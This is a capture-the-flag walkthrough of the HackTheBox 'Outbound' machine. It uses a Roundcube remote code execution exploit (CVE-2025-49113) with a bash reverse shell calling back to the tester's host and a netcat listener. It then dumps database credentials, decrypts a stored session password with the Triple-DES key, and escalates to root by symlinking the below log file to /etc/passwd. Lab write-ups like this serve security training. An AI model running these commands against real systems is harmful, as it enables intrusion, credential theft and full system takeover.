Introduction

In this HackTheBox lab, Outbound, I explored a real-world scenario involving a Roundcube webmail server. The objective was to perform end-to-end penetration testing from initial enumeration and vulnerability discovery to exploitation, credential harvesting, and ultimately gaining root access.

Reconnaissance

I began the engagement by performing a comprehensive Nmap scan to identify open ports and running services on the target machine.

nmap 10.10.11.77 -sV -A

The results were as follows:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_  256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The scan revealed two active services:

• SSH (port 22) — a potential remote login point.
• HTTP (port 80) — a web server running nginx 1.24.0, which redirected to the domain mail.outbound.htb.

To correctly interact with the web application, I updated my /etc/hosts file to resolve the domain to the target IP:

echo “10.10.11.77 mail.outbound.htb” | sudo tee -a /etc/hosts

This ensured mail.outbound.htbresolved to the target, enabling further web enumeration.

Exploitation

After accessing the web application with the provided credentials User: tylerPass: LhKL1o9Nm3X2, I observed that the mailbox was completely empty.

To identify potential vulnerabilities, I used Nuclei, a fast and configurable vulnerability scanner developed by ProjectDiscovery. I ran the following command:

nuclei -u http://mail.outbound.htb -tags cves

Note: Nuclei requires regularly updated YAML templates to detect known vulnerabilities, misconfigurations, CVEs, and exposures in web applications, APIs, and servers.

The scan flagged a critical vulnerability:

[CVE-2025-49113:version_check] [http] [critical] http://mail.outbound.htb/ ["Roundcube Version: 1.6.10"]

This indicated that the target was running a vulnerable version of Roundcube Webmail susceptible to Remote Code Execution (RCE).

Exploiting CVE-2025–49113

I proceeded with the exploit:

1. Clone the exploit repository:

git clone https://github.com/hakaioffsec/CVE-2025-49113-exploit
cd CVE-2025-49113-exploit

2. Install requirements:

sudo apt install php-cli

3. Configure the payload using the provided credentials and a reverse shell:

php CVE-2025-49113.php http://mail.outbound.htb <username> <password> "bash -c 'bash -i >& /dev/tcp/<your-ip>/<port> 0>&1'"

4. Set up a Netcat listener on my local machine:

nc -lnvp 4444

5. Execute the exploit:

php CVE-2025-49113.php http://mail.outbound.htb tyler LhKL1o9Nm3X2 "bash -c 'bash -i >& /dev/tcp/10.10.14.59/4444 0>&1'"

The tool confirmed:

[+] Starting exploit (CVE-2025-49113)...
[*] Checking Roundcube version...
[*] Detected Roundcube version: 10610
[+] Target is vulnerable!
[+] Login successful!
[*] Exploiting...

Shortly after, the reverse shell connected to my listener:

Listening on 0.0.0.0 4444
Connection received on 10.10.11.77 47002
bash: no job control in this shell
www-data@mail:/$

At this stage, I had successfully obtained a low-privileged shell as www-data on the target system.

Post-Exploitation: Database Enumeration

After obtaining a low-privileged shell on the target, I started enumerating the Roundcube Webmail configuration files. Accessing the configuration allowed me to identify critical credentials stored on the system. I navigated to the Roundcube config directory and read the main configuration file:

cat /var/www/html/roundcube/config/config.inc.php

From the file, I discovered the MySQL database credentials:

Database user: roundcube
Database password: RCDBPass2025
Database host: localhost
Database: roundcube

Additionally, I confirmed that MySQL was running on its default port 3306, giving me an opportunity to query the database directly.

Enumerating Active Sessions

Using the retrieved credentials, I connected to the Roundcube database to enumerate active user sessions:

mysql -u roundcube -pRCDBPass2025 -h localhost roundcube -e "use roundcube; select * from session;" -E

The output revealed session IDs, associated IPs, and session variables for users currently logged in. For example:

*************************** 2. row ***************************
sess_id: 6a5ktqih5uca6lj8vrmgh9v0oh
ip: 172.17.0.1
vars: bGFuZ3VhZ2V8czo1OiJlbl9VUyI7aW1hcF9uYW1lc3BhY2V8YTo0OntzOjg6InBlcnNvbmFsIjthOjE6e2k6MDthOjI6e2k6MDtzOjA6IiI7aToxO3M6MToiLyI7fX1zOjU6Im90aGVyIjtOO3M6Njoic2hhcmVkIjtOO3M6MTA6InByZWZpeF9vdXQiO3M6MDoiIjt9aW1hcF9kZWxpbWl0ZXJ8czoxOiIvIjtpbWFwX2xpc3RfY29uZnxhOjI6e2k6MDtOO2k6MTthOjA6e319dXNlcl9pZHxpOjE7dXNlcm5hbWV8czo1OiJqYWNvYiI7c3RvcmFnZV9ob3N0fHM6OToibG9jYWxob3N0IjtzdG9yYWdlX3BvcnR8aToxNDM7c3RvcmFnZV9zc2x8YjowO3Bhc3N3b3JkfHM6MzI6Ikw3UnYwMEE4VHV3SkFyNjdrSVR4eGNTZ25JazI1QW0vIjtsb2dpbl90aW1lfGk6MTc0OTM5NzExOTt0aW1lem9uZXxzOjEzOiJFdXJvcGUvTG9uZG9uIjtTVE9SQUdFX1NQRUNJQUwtVVNFfGI6MTthdXRoX3NlY3JldHxzOjI2OiJEcFlxdjZtYUk5SHhETDVHaGNDZDhKYVFRVyI7cmVxdWVzdF90b2tlbnxzOjMyOiJUSXNPYUFCQTF6SFNYWk9CcEg2dXA1WEZ5YXlOUkhhdyI7dGFza3xzOjQ6Im1haWwiO3NraW5fY29uZmlnfGE6Nzp7czoxNzoic3VwcG9ydGVkX2xheW91dHMiO2E6MTp7aTowO3M6MTA6IndpZGVzY3JlZW4iO31zOjIyOiJqcXVlcnlfdWlfY29sb3JzX3RoZW1lIjtzOjk6ImJvb3RzdHJhcCI7czoxODoiZW1iZWRfY3NzX2xvY2F0aW9uIjtzOjE3OiIvc3R5bGVzL2VtYmVkLmNzcyI7czoxOToiZWRpdG9yX2Nzc19sb2NhdGlvbiI7czoxNzoiL3N0eWxlcy9lbWJlZC5jc3MiO3M6MTc6ImRhcmtfbW9kZV9zdXBwb3J0IjtiOjE7czoyNjoibWVkaWFfYnJvd3Nlcl9jc3NfbG9jYXRpb24iO3M6NDoibm9uZSI7czoyMToiYWRkaXRpb25hbF9sb2dvX3R5cGVzIjthOjM6e2k6MDtzOjQ6ImRhcmsiO2k6MTtzOjU6InNtYWxsIjtpOjI7czoxMDoic21hbGwtZGFyayI7fX1pbWFwX2hvc3R8czo5OiJsb2NhbGhvc3QiO3BhZ2V8aToxO21ib3h8czo1OiJJTkJPWCI7c29ydF9jb2x8czowOiIiO3NvcnRfb3JkZXJ8czo0OiJERVNDIjtTVE9SQUdFX1RIUkVBRHxhOjM6e2k6MDtzOjEwOiJSRUZFUkVOQ0VTIjtpOjE7czo0OiJSRUZTIjtpOjI7czoxNDoiT1JERVJFRFNVQkpFQ1QiO31TVE9SQUdFX1FVT1RBfGI6MDtTVE9SQUdFX0xJU1QtRVhURU5ERUR8YjoxO2xpc3RfYXR0cmlifGE6Njp7czo0OiJuYW1lIjtzOjg6Im1lc3NhZ2VzIjtzOjI6ImlkIjtzOjExOiJtZXNzYWdlbGlzdCI7czo1OiJjbGFzcyI7czo0MjoibGlzdGluZyBtZXNzYWdlbGlzdCBzb3J0aGVhZGVyIGZpeGVkaGVhZGVyIjtzOjE1OiJhcmlhLWxhYmVsbGVkYnkiO3M6MjI6ImFyaWEtbGFiZWwtbWVzc2FnZWxpc3QiO3M6OToiZGF0YS1saXN0IjtzOjEyOiJtZXNzYWdlX2xpc3QiO3M6MTQ6ImRhdGEtbGFiZWwtbXNnIjtzOjE4OiJUaGUgbGlzdCBpcyBlbXB0eS4iO311bnNlZW5fY291bnR8YToyOntzOjU6IklOQk9YIjtpOjI7czo1OiJUcmFzaCI7aTowO31mb2xkZXJzfGE6MTp7czo1OiJJTkJPWCI7YToyOntzOjM6ImNudCI7aToyO3M6NjoibWF4dWlkIjtpOjM7fX1saXN0X21vZF9zZXF8czoyOiIxMCI7
user_id: 1
username: jacob

Decoding Session Data

The session data retrieved from the Roundcube database appeared to be encoded. To extract meaningful information such as usernames, session tokens, or potentially passwords I used CyberChef for decoding and decryption.

L7Rv00A8TuwJAr67kITxxcSgnIk25Am/

From the config.inc.php file, I had already noted the Roundcube encryption key:

rcmail-!24ByteDESkey*Str

This key is essential for decrypting session data and user credentials. After researching Roundcube’s encryption mechanism, I confirmed it uses Triple-DES (DES-EDE3-CBC) for encrypting sensitive values.

Preparing the Data for Decryption

Before decryption, the session data must be decoded from Base64 to hexadecimal, providing a valid input for the Triple-DES algorithm.

Additionally, the decryption requires an initialization vector (IV). For Roundcube, the IV is 8 bytes long and can be derived from the first 8 alphanumeric pairs of the hex-converted Base64 input:

IV: 2f b4 6f d3 40 3c 4e ec
Input (hex): 09 02 be bb 90 84 f1 c5 c4 a0 9c 89 36 e4 09 bf

Decrypting in CyberChef

Using the above IV and the encryption key, I configured CyberChef to:

1. Convert the Base64 session string to hex.
2. Apply Triple-DES (DES-EDE3-CBC) decryption with the known key and IV.

This process successfully revealed Jacob’s password and other session information, enabling further exploitation such as session hijacking or lateral movement on the target machine.

Switching to Jacob

After successfully decryption the session data, I retrieved Jacob’s password:

595mO8DmwGeD

With this credential, I performed a user switch to assume Jacob’s account on the target system:

su jacob

Post-Exploitation: SSH Credential Discovery and Access

After switching to Jacob’s account, I performed a directory enumeration and discovered an email containing SSH credentials in his mailbox:

cat /home/jacob/mail/INBOX/jacob

The email from Mel indicated a recently enabled resource monitoring system and included the updated password for Jacob’s SSH account:

Username: jacob
Password: gY4Wr3a1evp4

With these credentials, I was able to connect to the target system via SSH:

ssh [email protected]

When prompted, I entered the password extracted from the email. Authentication succeeded, granting me a remote SSH session as Jacob, which provided a more stable and interactive shell for further enumeration and potential privilege escalation.

Retrieving the User Flag

After successfully establishing an SSH session as Jacob, I proceeded to locate the user flag on the system. Using the standard search for HackTheBox-style flags, I ran:

find / -type f -name "user.txt" 2>/dev/null

This command located the user flag in Jacob’s home directory. Displaying its contents confirmed successful retrieval:

cat /home/jacob/user.txt

At this point, I had successfully captured the user flag, completing the initial compromise of the system.

Privilege Escalation: Exploiting CVE-2025–27591

After retrieving the user flag, I checked the sudo privileges for Jacob to identify potential paths for privilege escalation:

sudo -l

The output revealed that Jacob could run the below command with wildcards without a password:

(ALL : ALL) NOPASSWD: /usr/bin/below *, !/usr/bin/below --config*, !/usr/bin/below --debug*, !/usr/bin/below -d*

This indicated a potential command injection vulnerability. After research, I identified CVE-2025–27591, which allows privilege escalation via improperly handled file logging in the below utility.

Exploiting the Vulnerability

I located a publicly available proof-of-concept exploit for this CVE:

https://github.com/BridgerAlderson/CVE-2025-27591-PoC/blob/main/exploit.py

I transferred the exploit to the target, edited it if necessary, and executed it as Jacob:

nano exploit.py
python3 exploit.py

The exploit performed the following steps:

1. Verified that /var/log/below was world-writable.
2. Removed the existing log file and created a symlink to /etc/passwd.
3. Triggered the below record command to append a malicious root entry.
4. Switched to a root shell via the newly created user.

Upon successful exploitation, I obtained a root shell:

root@outbound:/home/jacob#

Retrieving the Root Flag

Finally, I retrieved the root flag to complete the capture-the-flag objective:

cat /root/root.txt

This confirmed full system compromise and completion of the exercise.

For more detailed walkthroughs and write-ups, check out my GitHub